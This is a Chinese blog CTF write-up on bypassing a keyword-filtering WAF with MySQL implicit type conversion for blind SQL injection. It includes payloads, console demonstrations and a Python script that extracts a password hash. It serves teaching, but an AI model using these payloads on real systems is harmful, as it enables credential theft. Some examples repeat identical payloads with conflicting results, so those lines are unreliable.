mysql 注入关键字waf_利用mysql的隐式类型转换绕过waf注入

最新推荐文章于 2023-05-24 14:18:07 发布
最新推荐文章于 2023-05-24 14:18:07 发布
阅读量192 收藏
点赞数
文章标签: mysql 注入关键字waf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39802132/article/details/114335974
版权
本文介绍了如何通过MySQL的隐式类型转换特性来绕过WAF进行SQL注入。在CTF比赛中,面对过滤了特定关键字的WAF,作者通过测试发现可以利用字符串到数字的转换进行逻辑判断。通过构造特定的payload,如`uname='-(length(passwd)=passwd的长度)-'&passwd=123456`,成功判断出数据库中passwd字段的长度和值,最终解密出密码。
摘要由CSDN通过智能技术生成

今天做的一道ctf题,要求绕过waf去注入,可以通过mysql隐式类型转换的特性去绕过waf,在这里记录下来供大家学习一下

题目地址:题目地址(比赛结束后可能会失效)

HINT:我都过滤了,看你怎么绕。记住是mysql

打开后看到是一个登陆框

54867e3c9fefebb9fcf410d0c33a0645.png

结合题目提示猜测是去绕WAF注入,首先测试了一下,发现当用户名正确而密码错误时会返回password error,当用户名错误时会返回username error的错误,于是猜测可能存在盲注。

测试了一下,发现大概过滤了以下关键字#、,、union、--+、and、or、|、%26(&的url编码)简单来说,就是不能使用and,or等关键字进行逻辑判断去盲注,同样不能使用注释符去注释后面的语句。谷歌了一下相关的资料,发现这种情况可以利用mysql的隐式类型转换去绕过,类似于php的弱类型。所谓的隐式类型转换,简单来说,就是对mysql的字符类型进行一些加、减、取余等数字操作运算时,又或者是将字符类型与数字类型进行比较时,会将字符类型转为数字类型,比如mysql> select '45abcd'-'abc';

+----------------+

| '45abcd'-'abc' |

+----------------+

| 45 |

+----------------+

1 row in set, 2 warnings (0.02 sec)在这里将字符串45abcd转为了数字45,将字符串abc转为了数字0 于是可以得出不是以数字开头的字符串在进行隐式类型转换时都会转为数字0

再看mysql> select 'aaa'=0;

+---------+

| 'aaa'=0 |

+---------+

| 1 |

+---------+

1 row in set, 1 warning (0.00 sec)在这里将字符串aaa与数字0进行比较时将字符串aaa转为了数字0

再看以下语句mysql> select * from users where username=0;

+----+----------+------------+

| id | username | password |

+----+----------+------------+

| 1 | Dumb | Dumb |

| 2 | Angelina | I-kill-you |

| 3 | Dummy | p@ssword |

| 4 | secure | crappy |

| 5 | stupid | stupidity |

| 6 | superman | genious |

| 7 | batman | mob!le |

| 8 | admin | admin |

| 9 | admin1 | admin1 |

| 10 | admin2 | admin2 |

| 11 | admin3 | admin3 |

| 12 | dhakkan | dumbo |

| 14 | admin4 | admin4 |

+----+----------+------------+

13 rows in set (0.00 sec)可以看到where username=0时会将数据表中所有数据类型查出来,因为username在数据库中的存储类型为varchar类型,也就是字符串类型,在进行比较时会将这些字符串类型全转为数字类型,所以不以数字开头的字符串都会被转成0,从而查询出所有结果

再看mysql> select * from users where username=''-'';

+----+----------+------------+

| id | username | password |

+----+----------+------------+

| 1 | Dumb | Dumb |

| 2 | Angelina | I-kill-you |

| 3 | Dummy | p@ssword |

| 4 | secure | crappy |

| 5 | stupid | stupidity |

| 6 | superman | genious |

| 7 | batman | mob!le |

| 8 | admin | admin |

| 9 | admin1 | admin1 |

| 10 | admin2 | admin2 |

| 11 | admin3 | admin3 |

| 12 | dhakkan | dumbo |

| 14 | admin4 | admin4 |

+----+----------+------------+

13 rows in set (0.00 sec)可以看出当where username=''-''时会进行隐式类型转换,运算结果相当于where username=0,会返回所有结果

如果将中间的0变为1,相当于where username=-1,由于数据库里没有以-1开头的字符串,就会返回空mysql> select * from users where username=''-'';

Empty set (0.00 sec)由此可以看出我们是可以在中间这个位置进行逻辑判断去盲注的

知道了这些后来返回题目看这道题,构造payload:

uname='-'&passwd=123456

这里用户名有查询结果,所以会返回password error

8fe02170f903f69632d5de12f2ed85f7.png

构造payload:

uname='-'&passwd=123456

而这里用户名没有查询结果,所以会返回username error的错误

10eff93218bb73e696afbb29a7281ce4.png

按照这个思路,可以进行逻辑判断进行盲注,构造payload猜出数据库中passwd字段的长度uname='-(length(passwd)=passwd的长度)-'&passwd=123456当(length(passwd)=passwd的长度)为真时结果为1,也就是查不出用户名,会返回username error,为假时结果为0,会返回查询结果但是密码错误,也就会返回password error

5cfa96ca6456bdf1e62e6e84e63604d1.png

f57d0eca7aba36cd7f5a7679f73005f1.png

通过这种方式可以判断出用户表中有一个长度为32字节的passwd字段

同样的可以通过这种方式判断出passwd字段中的值,用python写一个脚本即可,贴出我的代码import requests

url="http://118.190.152.202:8019/login.php"

passwd=""

for i in range(1,33):

for j in range(1,256):

data={

'uname':"'-(ascii(mid((passwd)from(%d)))=%d)-'"%(i,j),

'passwd':'admin'

}

html=requests.post(url,data=data).content

if "username error!!" in html:

passwd=passwd+chr(j)

print passwd

break为了更好的理解脚本,可以看看以下我测试时写的查询语句mysql> select mid((password)from(1)) from users;

+------------------------+

| mid((password)from(1)) |

+------------------------+

| Dumb |

| I-kill-you |

| p@ssword |

| crappy |

| stupidity |

| genious |

| mob!le |

| admin |

| admin1 |

| admin2 |

| admin3 |

| dumbo |

| admin4 |

+------------------------+

13 rows in set (0.00 sec)

mysql> select mid((password)from(2)) from users;

+------------------------+

| mid((password)from(2)) |

+------------------------+

| umb |

| -kill-you |

| @ssword |

| rappy |

| tupidity |

| enious |

| ob!le |

| dmin |

| dmin1 |

| dmin2 |

| dmin3 |

| umbo |

| dmin4 |

+------------------------+

13 rows in set (0.00 sec)

mysql> select ascii(mid((password)from(1))) from users;

+-------------------------------+

| ascii(mid((password)from(1))) |

+-------------------------------+

| 68 |

| 73 |

| 112 |

| 99 |

| 115 |

| 103 |

| 109 |

| 97 |

| 97 |

| 97 |

| 97 |

| 100 |

| 97 |

+-------------------------------+

13 rows in set (0.00 sec)

mysql> select ascii(mid((password)from(2))) from users;

+-------------------------------+

| ascii(mid((password)from(2))) |

+-------------------------------+

| 117 |

| 45 |

| 64 |

| 114 |

| 116 |

| 101 |

| 111 |

| 100 |

| 100 |

| 100 |

| 100 |

| 117 |

| 100 |

+-------------------------------+

13 rows in set (0.00 sec)

mysql> select * from users where username='a'-(ascii(mid((password)from(2)))=117)-'b';

+----+----------+------------+

| id | username | password |

+----+----------+------------+

| 2 | Angelina | I-kill-you |

| 3 | Dummy | p@ssword |

| 4 | secure | crappy |

| 5 | stupid | stupidity |

| 6 | superman | genious |

| 7 | batman | mob!le |

| 8 | admin | admin |

| 9 | admin1 | admin1 |

| 10 | admin2 | admin2 |

| 11 | admin3 | admin3 |

| 14 | admin4 | admin4 |

+----+----------+------------+

11 rows in set, 26 warnings (0.00 sec)

mysql> select * from users where username='a'-(ascii(mid((password)from(2)))=118)-'b';

+----+----------+------------+

| id | username | password |

+----+----------+------------+

| 1 | Dumb | Dumb |

| 2 | Angelina | I-kill-you |

| 3 | Dummy | p@ssword |

| 4 | secure | crappy |

| 5 | stupid | stupidity |

| 6 | superman | genious |

| 7 | batman | mob!le |

| 8 | admin | admin |

| 9 | admin1 | admin1 |

| 10 | admin2 | admin2 |

| 11 | admin3 | admin3 |

| 12 | dhakkan | dumbo |

| 14 | admin4 | admin4 |

+----+----------+------------+

13 rows in set, 26 warnings (0.00 sec)最后跑出密码

b54edb1d08d3b6b842f735c21a0ff1b9.png

MD5在线解密一下

8c94618720e8780bfc447dcd3db0b7df.png

nishishabi1438用户名admin,密码nishishabi1438,登陆成功

a9b359efdeafa2b336f67e49b19d8b37.png

weixin_39802132
关注
网络攻防中的黑客常用技巧:可回显注入、盲注查询、报错注入、写exe,dll文件提权、类型隐式转换、sqlmap tips、SqlMap绕过WAF实例、自定义payload脚本、自定义bypass脚本等
代码讲故事
03-20 318
网络攻防中的黑客常用技巧:可回显注入、盲注查询、报错注入、写exe,dll文件提权、类型隐式转换、sqlmap tips、SqlMap绕过WAF实例、自定义payload脚本、自定义bypass脚本等。
运维知识点-MySQL从小白到入土
最新发布
aming小老弟
11-04 663
获取表rider_users中字段id的备注信息:sql。
网络安全各类WAF绕过技巧
zxcvbnmasdflzl的博客
05-24 3012
即传入一段长数据使waf失效,从而实现绕过waf。某些waf处理POST的数据时,只会检测开头的8K,后面选择全部放过。
在SQL注入利用MySQL隐形的类型转换绕过WAF检测(转freebuf)
weixin_30546933的博客
04-21 165
web应用一般采用基于表单的身份验证方式(页面雏形如下图所示),处理逻辑就是将表单中提交的用户名和密 码传递到后台数据库去查询,并根据查询结果判断是否通过身份验证。对于LAMP架构的web应用而言,处理逻辑采用PHP,后台数据库采用MySQL。而在这一处理过程,由于种种处理不善,会导致不少严重的漏洞,除去弱口令与暴力破解,最常见的就是SQL注入。SQL注入可以在SQLNuke——mysql 注入l...
mysql 注入 绕过防火墙,利用MySQL隐形类型转换绕过WAF
weixin_42365251的博客
03-23 111
Default<html><body><form id="form1" name="form1" method="post" action="login.php"><label>UserName<input name="user" type="text" id="user"/></label><br/><la...
mysql 注入 waf_SQL注入WAF-Bypass
weixin_34050162的博客
01-27 438
title: SQL注入WAF Bypassdate: 2019-05-07 12:00:26tags:- Mysql- SQL注入- Bypass- WAFcategories:- Web安全- SQL注入针对CTF中SQL注入题里的绕过过滤,Bypass WAF做的一些归纳总结。前言之前做SQL注入相关的CTF题,总是有力不从心的感觉,每次都会被过滤搞到自闭,也是因为自己没有好好总结,导致遇...
mysql 注入 waf_项目实战 | 报错SQL注入绕过WAF
weixin_33040687的博客
02-07 343
文章来源:安译Sec报错的存在一个有趣的点:http://domain.com/xxx/news.php?id=xxx打开URL时,遇到了MySQL错误。Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean give in … on line 27访问端点时出现MySQL错误我们知道可以执行一些基于布尔的查...
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7355
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
SQL-labs通关合集及知识总结
qq_45584159的博客
12-19 1585
SQL-labs通关合集及知识总结 文章目录前言一、base challengeSQL注入基本知识: 前言 希望做完这个靶场对SQL注入和sqlmap有更加深入的理解。 一、base challenge SQL注入基本知识: 1.在MySQL中有这样一个数据库information_schema数据库,永安里存储数据库的元信息。 其中有三个表schemata(数据库名),tables(表名),columns(类名或字段名) 在schemata表中,schema_name字段用来存储数据库名。 在t
firewall | iptables | 防火墙
gxy_learning的博客
12-12 2362
防火墙 防火墙介绍 防火墙:在计算机领域,防火墙是用于保护内网信息安全的设备,其会依照用户定义的规则,允许或限制数据的传输 分类 逻辑: 主机防火墙:针对单个主机 网络防火墙:针对网络进行防护,处于网络边缘,防火墙背后是局域网 物理: 硬件防火墙:在硬件级别实现防火墙,另一部分基于软件实现,性能高,成本高。常处于网络边缘 如cisco(思科)ASA 软件防火墙:单独使用 具备配置数据包通过规则 的软件来实现数据包过滤,其性能相较于硬件防火墙低,成本低,在一定程度上会影响到主
mysql 注入关键字waf_SQL注入中的WAF绕过技术
weixin_29015899的博客
02-18 262
作者:bystander博客:http://leaver.me论坛:法克论坛目录1.大小写绕过2.简单编码绕过3.注释绕过4.分隔重写绕过5.Http参数污染(HPP)6.使用逻辑运算符or /and绕过7.比较操作符替换8.同功能函数替换9.盲注无需or和and10.加括号11.缓冲区溢出绕过1. 大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Uni...
mysql 隐式类型转换_MYSQL有关False注入隐式类型转换
weixin_29029169的博客
02-02 98
如果一个或两个参数是 ,则比较的结果为 ,但 -安全<=>相等比较运算符除外。因为 ,结果为真。无需转换。NULLNULLNULLNULL <=> NULL如果比较操作中的两个参数都是字符串,则它们被比较为字符串。如果两个参数都是整数,则它们被比较为整数。如果不与数字进行比较,十六进制值将被视为二进制字符串。如果其中一个参数是TIMESTAMP 或 DATETIME 列,另...
Mysql False注入Mysql隐式转换
baynk的博客
08-08 665
此文是由于一个CTF题而引发的学习和思考,以后坚持做CTF,还是能学不少东西的,有点后悔没早点开始了。。。 False注入 我也不知道为啥要叫这个名字,可能是因为利用系统错误来完成的注入,但是这个又和报错注入(error)不一样,所以才叫False注入吧。 来看这样一张普通的表,非常简单的一张表。 接着查询的时候指定一下name,但是指定的值为0。看如下表中的记录。 是不是很神奇,没有name...
mysql特有的特性绕过_waf绕过:基于mysql特性的waf绕过技巧小总结
weixin_39988888的博客
01-20 199
研究过国内外的waf。分享一些 奇淫绝技。一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。Mysqltips1: 神奇的 ` (格式输出表的那个控制符)过空格和一些正则。mysql> select`version`();+———————-+|`version`()|+———————-+|5.1.50-commu...
mysqlwaf_SQL注入9种绕过WAF方法
weixin_30586417的博客
01-31 675
SQL注入9种绕过WAF方法0x01前言WAF区别于常规防火墙是因为WAF能够过滤特定Web应用程序的内容,而常规防火墙则充当服务器之间的防御门。通过检查HTTP的流量,它可以防御Web应用安全漏洞,如阻止来自、(XSS)、和安全配置错误。0x02 WAF工作原理§检测异常协议:拒绝不符合HTTP标准的请求§增强型的输入验证:代理和服务器端验证,而不仅仅是客户端验证§白名单和黑名单§基于规则和异常...
【JavaScript】-- 隐式数据类型转换
qq_48802092的博客
08-10 1776
如果字符串加数字,数字就会转成字符串。而 数字加数字 或 字符串加字符串 则不需要进行转换直接进行运算或字符串拼接。数字减字符串,字符串转成数字。如果字符串不是纯数字就会转成NaN。字符串减数字也一样。两个字符串相减也先转成数字。...
高性能MySQL实战课
05-21
限时福利1:购课进答疑群专享柳峰(刘运强)老师答疑服务 为什么需要掌握高性能的MySQL实战? 由于互联网产品用户量大、高并发请求场景多,因此对MySQL的性能、可用性、扩展性都提出了很高的要求。使用MySQL解决大量数据以及高并发请求已经是程序员的必备技能,也是衡量一个程序员能力和薪资的标准之一。 为了让大家快速系统了解高性能MySQL核心知识全貌,我为你总结了「高性能 MySQL 知识框架图」,帮你梳理学习重点,建议收藏! 【课程设计】 课程分为四大篇章,将为你建立完整的 MySQL 知识体系,同时将重点讲解 MySQL 底层运行原理、数据库的性能调优、高并发、海量业务处理、面试解析等。 一、性能优化篇: 主要包括经典 MySQL 问题剖析、索引底层原理和事务与锁机制。通过深入理解 MySQL 的索引结构 B+Tree ,学员能够从根本上弄懂为什么有些 SQL 走索引、有些不走索引,从而彻底掌握索引的使用和优化技巧,能够避开很多实战中遇到的“坑”。 二、MySQL 8.0新特性篇: 主要包括窗口函数和通用表表达式。企业中的许多报表统计需求,如果不采用窗口函数,用普通的 SQL 语句是很难实现的。 三、高性能架构篇: 主要包括主从复制和读写分离。在企业的生产环境中,很少采用单台MySQL节点的情况,因为一旦单个节点发生故障,整个系统都不可用,后果往往不堪设想,因此掌握高可用架构的实现是非常有必要的。 四、面试篇: 程序员获得工作的第一步,就是高效的准备面试,面试篇主要从知识点回顾总结的角度出发,结合程序员面试高频MySQL问题精讲精练,帮助程序员吊打面试官,获得心仪的工作机会。
ctf隐写术
Joker_Dgh的博客
04-25 4297
基于文件结构的图片隐写:直接嵌入式隐写,在不影响文件的使用时,在文件中藏入秘密信息,实现信息隐藏; 根据文件特性与冗余性分为:追加插入法和前置插入法,插入信息科分为:文本插入,文件插入; 追加插入法是最常用的,最简单的一种方法,利用文件特性在文件末尾加进行附加数据: 分离文件,一个照片文件里可能有两个照片,组成结构为文件头数据块文件尾文件头数据块文件尾 因为有一个文件尾,所以后一部分的没有被识别出来,使用formost工具分离。 1.PNG图片结构: 标准的PNG文件结构包括:PNG文件标识.
【CTF】隐写术专题
weixin_41687289的博客
09-13 581
0x00: 传送门:https://www.mozhe.cn/bug/detail/amd6YTVxNGMzYnozcGxGZUdaWnRYQT09bW96aGUmozhe 知识点:js禁止右键时怎么处理。浏览器禁用js即可。firefox为例。浏览器输入about:config , 搜索javascript.enabled 右键切换成False即可。 题目提示了图片要转换格式。丢到了...
SQL注入绕过WAF策略与技巧解析
SQL注入绕过WAF是一个动态且不断演变的过程,攻击者会持续探索新的方法来利用WAF的漏洞。为了保护系统安全,除了使用WAF之外,还应实施严格的输入验证、参数化查询和错误处理策略。定期更新安全规则和监测系统行为,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值